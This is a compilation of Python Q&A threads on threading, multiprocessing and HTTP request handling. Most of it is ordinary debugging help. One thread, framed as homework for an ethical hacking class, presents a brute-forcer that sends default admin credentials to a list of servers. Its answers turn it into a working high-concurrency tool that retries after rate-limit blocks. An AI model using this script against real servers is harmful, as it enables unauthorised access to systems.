Python threading: confirming responses before moving to the next line

Recently I have been working to integrate Google Directory, Calendar and Classroom with the existing services that we have.
I need to loop through 1500 objects and make a request to Google for each one to check something. Responses from Google take a while, so I want to wait on each request to complete, but at the same time run other checks.
def __get_students_of_course(self, course_id, index_in_course_list, page=None):
    print("getting students from gclass ", course_id, "page ", page)
    # self.__check_request_count(10)
    try:
        response = self.class_service.courses().students().list(
            courseId=course_id, pageToken=page).execute()
        # the response must come back before proceeding to the next checks
        course_to_add_to = self.course_list_gsuite[index_in_course_list]
        current_students = course_to_add_to["students"]
        for student in response["students"]:
            current_students.append(student["profile"]["emailAddress"])
        self.course_list_gsuite[index_in_course_list] = course_to_add_to
        try:
            if "nextPageToken" in response:
                self.__get_students_of_course(
                    course_id, index_in_course_list, page=response["nextPageToken"])
            else:
                return
        except Exception as e:
            print(e)
            return
    except Exception as e:
        print(e)
And I run that function from another function
def __check_course_state(self, course):
    course_to_create = {...}
    try:
        g_course = next(
            (g_course for g_course in self.course_list_gsuite if g_course["name"] == course_to_create["name"]), None)
        if g_course != None:
            index_2 = None
            for index_1, class_name in enumerate(self.course_list_gsuite):
                if class_name["name"] == course_to_create["name"]:
                    index_2 = index_1
            self.__get_students_of_course(
                g_course["id"], index_2)  # need to wait here
            students_enrolled_in_g_class = self.course_list_gsuite[index_2]["students"]
            request = requests.post()  # need to wait here
            students_in_iras = request.json()
            students_to_add_in_g_class = []
            for student in students["data"]:
                try:
                    pass
                except Exception as e:
                    print(e)
                students_to_add_in_g_class.append(
                    student["studentId"])
            if len(students_to_add_in_g_class) != 0:
                pass
            else:
                pass
        else:
            pass
    except Exception as e:
        print(e)
I need to do these tasks for 1500 objects. They are not related to each other, so I want to move on to the next object in the loop while the current one waits for its results to come back and finish.
Here is how I tried this with threads:
def create_courses(self):
    # pool = []
    counter = 0
    with concurrent.futures.ThreadPoolExecutor() as executor:
        results = executor.map(
            self.__check_course_state, self.courses[0:5])
The problem is that when I run it like this I get multiple SSL errors and other errors. As far as I understand, while the threads are running the requests never wait to finish before moving to the next line, so the request object has nothing in it and that is why it throws errors?
Any ideas on how to approach this?

The SSL error occurs here because I was reusing the http instance from the Google API client library: self.class_service is being used to send a request while it is still waiting on another request, and that shared http object is not thread-safe. The best way to handle this is to create an instance of the service for every request.
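A minimal sketch of that approach, assuming an already-authorized credential object (self.creds is an assumed name, not from the original code) and using googleapiclient.discovery.build to construct a fresh Classroom service inside each call:

from concurrent.futures import ThreadPoolExecutor
from googleapiclient.discovery import build

class CourseSync:
    def __init__(self, creds, courses):
        self.creds = creds        # assumed: an authorized Google credential object
        self.courses = courses

    def __check_course_state(self, course):
        # Build a fresh Classroom service per call, so no http/SSL connection
        # is shared between threads.
        class_service = build("classroom", "v1", credentials=self.creds)
        return class_service.courses().students().list(
            courseId=course["id"]).execute()

    def create_courses(self):
        with ThreadPoolExecutor(max_workers=10) as executor:
            return list(executor.map(self.__check_course_state, self.courses))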

Related

Stop multiprocessing from going through entire list for function for bruteforcer

I am trying to make a brute forcer for my ethical hacking class using multiprocessing. I want it to iterate through the list of server IPs and try one login for each of them, but it prints every single IP before trying to make any connections; once all the IPs have been printed it starts trying to make connections, then prints a couple of IPs, then tries another connection, and so on.
I just want it to iterate through the list of IPs and try to connect to each one, one process per connection, with about 20 processes at a time.
import threading, requests, time, os, multiprocessing

global count2
login_list = [{"username": "admin", "password": "Password1"}]

with open('Servers.txt') as f:
    lines = [line.rstrip() for line in f]

count = []
for number in range(len(lines)):
    count.append(number)
count2 = count

def login(n):
    try:
        url = 'http://' + lines[n] + '/api/auth'
        print(url)
        if '/#!/init/admin' in url:
            print('[~] Admin panel detected, saving url and moving to next...')
        x = requests.post(url, json=login_list)
        if x.status_code == 422:
            print('[-] Failed to connect, trying again...')
            print(n)
        if x.status_code == 403:
            print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
            time.sleep(20)
            print(n)
        if x.status_code == 200:
            print('\n[~] Connection successful! Login to ' + url + ' saved.\n')
            print(n)
    except:
        print('[#] No more logins to try for ' + url + ' moving to next server...')
        print('--------------')

if __name__ == "__main__":
    # creating a pool object
    p = multiprocessing.Pool()
    # map list to target function
    result = p.map(login, count2)
An example of the Servers.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP addresses.
I think you're confused about how the multiprocessing map function passes values to the relevant process. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError

IPLIST = ['83.88.223.86:9000',
          '75.37.144.153:9000',
          '138.244.6.184:9000',
          '34.228.116.82:9000',
          '125.209.107.178:9000',
          '33.9.12.53:9000',
          'www.google.com']

PARAMS = {'username': 'admin', 'password': 'passw0rd'}

def err(msg):
    print(msg, file=sys.stderr)

def process(ip):
    with requests.Session() as session:
        url = f'http://{ip}/api/auth'
        try:
            (r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
        except ConnectionError:
            err(f'Unable to connect to {url}')
        except HTTPError:
            err(f'HTTP {r.status_code} for {url}')
        except Exception as e:
            err(f'Unexpected exception {e}')

def main():
    with Pool() as pool:
        pool.map(process, IPLIST)

if __name__ == '__main__':
    main()
Additional notes: you probably want to specify a timeout, otherwise unreachable addresses will take a long time to process due to default retries. Review the exception handling.
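As a rough illustration of that note (not part of the original answer), a requests Session can be given an explicit retry policy and each call a timeout; the retry counts, backoff and URL below are placeholders:

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

session = requests.Session()
# Retry transient server errors a few times with a small backoff (placeholder values).
retries = Retry(total=3, backoff_factor=0.5, status_forcelist=[500, 502, 503, 504])
session.mount('http://', HTTPAdapter(max_retries=retries))
session.mount('https://', HTTPAdapter(max_retries=retries))

# A per-request timeout keeps unreachable hosts from blocking a worker for minutes.
r = session.post('http://198.51.100.1:9000/api/auth',
                 json={'username': 'admin', 'password': 'passw0rd'},
                 timeout=(3, 5))   # (connect timeout, read timeout) in seconds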
The first thing I would mention is that this is a job best suited to multithreading, since login is mostly waiting for network requests to complete and it is far more efficient to create threads than to create processes. In fact, you should create a thread pool whose size is equal to the number of URLs you will be posting to, up to a maximum of, say, 1000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading, your worker function (login in this case) processes a single element of the iterable that is passed to the map function. I think you get that. But instead of passing map the list of servers, you are passing a list of numbers (indices) and then login uses each index to look up the information in the lines list, which is rather indirect. Also, the way you build the list of indices could have been simplified to one line: count2 = list(range(len(lines))), or really just count2 = range(len(lines)) (you don't need a list).
Third, your messages say that you are retrying certain errors, but there is actually no logic to do so. Putting this together:
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time

# This must be a dict, not a list:
login_params = {"username": "admin", "password": "Password1"}

with open('Servers.txt') as f:
    servers = [line.rstrip() for line in f]

def login(session, server):
    url = f'http://{server}/api/auth'
    print(url)
    if '/#!/init/admin' in url:
        print(f'[~] Admin panel detected, saving {url} and moving to next...')
        # To move on to the next, you simply return
        # because you are through with this URL:
        return
    try:
        for retry_count in range(1, 4):  # will retry certain errors up to 3 times:
            r = session.post(url, json=login_params)
            if retry_count == 3:
                # This was the last try:
                break
            if r.status_code == 422:
                print(f'[-] Failed to connect to {url}, trying again...')
            elif r.status_code == 403:
                print(f'[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying {url} again in 20 seconds')
                time.sleep(20)
            else:
                break  # not something we retry
        r.raise_for_status()  # test status code
    except Exception as e:
        print('Got exception: ', e)
    else:
        print(f'\n[~] Connection successful! Login to {url} saved.\n')

if __name__ == "__main__":
    # creating a pool object
    with ThreadPool(min(len(servers), 1000)) as pool, \
            requests.Session() as session:
        # map will return a list of None since `login` returns None implicitly:
        pool.map(partial(login, session), servers)

Python Pool Multiprocessing Requests Hanging

The code in my program essentially makes 10 Python requests simultaneously and processes their output, also simultaneously. It was working for a while, but I changed something and can't work out what broke it.
The following is the calling code; it appears to freeze between lines 3 and 4, i.e. while doing the multithreaded requests.
The line print("failed to close ") does not print, which appears to indicate that the program never reaches the pool.close() instruction.
listoftensites = listoftensites
pool = Pool(processes=10)  # Initialize a pool of 10 processes
listoftextis, listofonline = zip(*pool.map(onionrequestthreaded, listoftensites))  # Use the pool to run the function on the items in the iterable
print("failed to close ")
pool.close()
# this means that no more tasks will be added to the pool
pool.join()
The function that is called, and in which it hangs, is below; the hang occurs immediately after the line print("failed in return"), which would appear to indicate that the requests do not terminate properly and return the expected values.
def onionrequestthreaded(onionurl):
    session = requests.session()
    session.proxies = {}
    session.proxies['http'] = 'socks5h://localhost:9050'
    session.proxies['https'] = 'socks5h://localhost:9050'
    onionurlforrequest = "http://" + onionurl
    #print(onionurlforrequest)
    print("failed with proxy session")
    try:
        print("failed in request")
        r = session.get(onionurlforrequest, timeout=15, allow_redirects=True)
        online = 2
        print("failed in text extraction")
        textis = r.text
    except:
        print("failed in except")
        #print("failed")
        online = 1
        textis = ""
    print("failed in return")
    return textis, online
Very confusing, but I'm probably doing something simple wrong. Please let me know if there's a solution to this, as I'm pulling my hair out.
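No answer is quoted here, but purely as an illustration of one way to narrow a hang like this down (the worker name matches the question's code; the thread pool and lazy iteration are assumptions, not a confirmed fix), the same worker can be driven so each completed site is visible as it returns:

# Hypothetical debugging sketch, not from the original thread: run the same
# onionrequestthreaded worker under a thread pool and iterate results lazily,
# so a single hanging site is easy to spot in the output.
from multiprocessing.pool import ThreadPool

def run_batch(listoftensites):
    results = []
    with ThreadPool(processes=10) as pool:
        # imap yields results one by one in order, instead of blocking
        # until the whole batch is done like map() does.
        for site, (textis, online) in zip(listoftensites,
                                          pool.imap(onionrequestthreaded, listoftensites)):
            print("finished", site, "online flag:", online)
            results.append((textis, online))
    return results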

Handling exception in calling a external api

I'm calling the Udemy external API to build a simple REST service for experimental purposes.
https://www.udemy.com/developers/affiliate/
Here is my get_all() courses method.
class Courses(object):
    """
    Handles all requests related to courses,
    i.e. gets the courses-list, courses-detail, coursesreviews-list.
    """
    def __init__(self, api):
        self.api = api
        logger.debug("courses initialized")

    def get_all(self):
        page = 1
        per_page = 20
        while True:
            res = self._get_courses(page, per_page)
            if not res['results']:
                break
            try:
                for one in res['results']:
                    yield one
            except Exception as e:  # -->> handling exception
                print(e)
                break
            page += 1

    def _get_courses_detail(self, page, per_page):
        resource = "courses"
        params = {'page': page, 'per_page': per_page,
                  # 'fields[course]': '#all'
                  }
        res = self.api.get(resource, params)
        return res
Now, is it reasonable to handle an exception (in the get_all() method) on the assumption that there could be some error in the data returned by the API?
Or is handling the exception in get_all not needed here, and it should be handled by the calling function instead?
Most of the open source projects that I see don't handle this exception.
I share the opinion in this answer: catch the exception as soon as possible and rethrow it to the next layer if needed.
With practice and experience with your code base, it becomes quite easy to judge when to add additional context to errors, and where it's most sensible to actually, finally, handle them.
Catch → Rethrow
Do this where you can usefully add more information that would save a developer having to work through all the layers to understand the problem.
Catch → Handle
Do this where you can make final decisions on what is an appropriate, but different execution flow through the software.
Catch → Error Return
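As a rough sketch of the first two strategies applied to the get_all generator above (written as methods of the Courses class; the wrapper exception and messages are illustrative, not part of the Udemy client):

class UdemyApiError(Exception):
    """Illustrative wrapper exception carrying extra context."""

def _get_courses(self, page, per_page):
    try:
        return self.api.get("courses", {'page': page, 'per_page': per_page})
    except Exception as e:
        # Catch -> Rethrow: add context (which page failed) and let a
        # higher layer decide what to do with it.
        raise UdemyApiError(f"fetching courses page {page} failed") from e

def get_all(self):
    page = 1
    while True:
        try:
            res = self._get_courses(page, 20)
        except UdemyApiError as e:
            # Catch -> Handle: this is the point where a final decision can be
            # made, e.g. stop iterating and log the failure.
            logger.warning("stopping course listing: %s", e)
            return
        if not res['results']:
            return
        yield from res['results']
        page += 1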

urllib request fails when page takes too long to respond

I have a simple function (in Python 3) that takes a URL and attempts to resolve it: it prints an error code if there is one (e.g. 404) or resolves a shortened URL to its full URL. My URLs are in one column of a CSV file and the output is saved in the next column. The problem arises when the program encounters a URL where the server takes too long to respond; the program just crashes. Is there a simple way to force urllib to print an error code if the server is taking too long? I looked into Timeout on a function call but that looks a little too complicated as I am just starting out. Any suggestions?
i.e. (COL A) shorturl (COL B) http://deals.ebay.com/500276625
def urlparse(urlColumnElem):
    try:
        conn = urllib.request.urlopen(urlColumnElem)
    except urllib.error.HTTPError as e:
        return (e.code)
    except urllib.error.URLError as e:
        return ('URL_Error')
    else:
        redirect = conn.geturl()
        #check redirect
        if(redirect == urlColumnElem):
            #print ("same: ")
            #print(redirect)
            return (redirect)
        else:
            #print("Not the same url ")
            return(redirect)
EDIT: if anyone gets the http.client.disconnected error (like me), see this question/answer http.client.RemoteDisconnected error while reading/parsing a list of URL's
Have a look at the docs:
urllib.request.urlopen(url, data=None[, timeout])
The optional timeout parameter specifies a timeout in seconds for blocking operations like the connection attempt (if not specified, the global default timeout setting will be used).
You can set a realistic timeout (in seconds) for your process:
conn = urllib.request.urlopen(urlColumnElem, timeout=realistic_timeout_in_seconds)
and in order for your code to stop crashing, move everything inside the try/except block:
import socket

def urlparse(urlColumnElem):
    try:
        conn = urllib.request.urlopen(
            urlColumnElem,
            timeout=realistic_timeout_in_seconds
        )
        redirect = conn.geturl()
        #check redirect
        if(redirect == urlColumnElem):
            #print ("same: ")
            #print(redirect)
            return (redirect)
        else:
            #print("Not the same url ")
            return(redirect)
    except urllib.error.HTTPError as e:
        return (e.code)
    except urllib.error.URLError as e:
        return ('URL_Error')
    except socket.timeout as e:
        return ('Connection timeout')
Now if a timeout occurs, you will catch the exception and the program will not crash.
Good luck :)
First, there is a timeout parameter that can be used to control the time allowed for urlopen. Next, a timeout in urlopen should just throw an exception, more precisely a socket.timeout. If you do not want it to abort the program, you just have to catch it:
def urlparse(urlColumnElem, timeout=5):  # allow 5 seconds by default
    try:
        conn = urllib.request.urlopen(urlColumnElem, timeout=timeout)
    except urllib.error.HTTPError as e:
        return (e.code)
    except urllib.error.URLError as e:
        return ('URL_Error')
    except socket.timeout:
        return ('Timeout')
    else:
        ...

Multiple simultaneous HTTP requests

I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in size up to several thousand.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stack Overflow (specifically, What is the fastest way to send 100,000 HTTP requests in Python?), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
One additional issue I'm facing is that the keyboard interrupt handler never fires (I'm trying Ctrl+C, but it does not kill the script).
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue

requestURLBase = "https://example.com/api"
apiKey = "123456"

concurrent = 200
keepTrying = 1

def doWork():
    while keepTrying == 1:
        url = q.get()
        status, body, url = checkStatus(url)
        checkResult(status, body, url)
        q.task_done()

def checkStatus(ourl):
    try:
        url = urlparse(ourl)
        conn = httplib.HTTPConnection(requestURLBase)
        conn.request("GET", url.path)
        res = conn.getresponse()
        respBody = res.read()
        conn.close()
        return res.status, respBody, ourl  # Status can be 210 for error or 300 for successful API response
    except:
        print "ErrorBlock"
        print res.read()
        conn.close()
        return "error", "error", ourl

def checkResult(status, body, url):
    if "unavailable" not in body:
        print status, body, url
        keepTrying = 1
    else:
        keepTrying = 0

q = Queue(concurrent * 2)
for i in range(concurrent):
    t = Thread(target=doWork)
    t.daemon = True
    t.start()

try:
    for value in open('valuelist.txt'):
        fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
        print fullUrl
        q.put(fullUrl)
    q.join()
except KeyboardInterrupt:
    sys.exit(1)
I'm new to Python, so there could be syntax errors as well... I'm definitely not familiar with multithreading, so perhaps I'm doing something else wrong too.
In your code, the list is only read once. It should be something like:
try:
    while True:
        for value in open('valuelist.txt'):
            fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
            print fullUrl
            q.put(fullUrl)
        q.join()
For the interrupt issue, remove the bare except line in checkStatus or make it except Exception. A bare except will catch all exceptions, including SystemExit (which is what sys.exit raises), and stop the Python process from terminating.
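A tiny standalone illustration of that point (not part of the question's code):

import sys

def swallow():
    try:
        sys.exit(1)
    except:                  # bare except also catches SystemExit, so the exit is swallowed
        print("SystemExit was swallowed; the process keeps running")

def propagate():
    try:
        sys.exit(1)
    except Exception:        # SystemExit derives from BaseException, not Exception
        print("never reached")

swallow()
propagate()                  # this call actually terminates the interpreter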
If I may make a couple of general comments, though:
Threading is not a good implementation for such large concurrencies.
Creating a new connection every time is not efficient.
What I would suggest is:
Use gevent for asynchronous network I/O.
Pre-allocate a queue of connections the same size as the concurrency number and have checkStatus grab a connection object when it needs to make a call. That way the connections stay alive and get reused, and there is no overhead from creating and destroying them, nor the increased memory use that goes with it.
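A minimal sketch of the gevent suggestion, written in Python 3 and reusing the question's requestURLBase/apiKey names; the requests Session, pool size and timeout are assumptions, not part of the original answer:

# Hypothetical sketch: gevent greenlets plus a shared requests Session, whose
# connection pool keeps sockets alive between calls instead of reconnecting.
from gevent import monkey
monkey.patch_all()          # must run before the network libraries are imported

import requests
from gevent.pool import Pool

requestURLBase = "https://example.com/api"
apiKey = "123456"
concurrent = 200

session = requests.Session()   # reuses connections via urllib3's pool

def check(value):
    fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value + "&years="
    try:
        r = session.get(fullUrl, timeout=10)
        if "unavailable" not in r.text:
            print(r.status_code, fullUrl)
            return True        # status changed, stop checking this item
    except requests.RequestException as e:
        print("error", fullUrl, e)
    return False

with open('valuelist.txt') as f:
    values = [line.strip() for line in f]

pool = Pool(concurrent)
pool.map(check, values)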
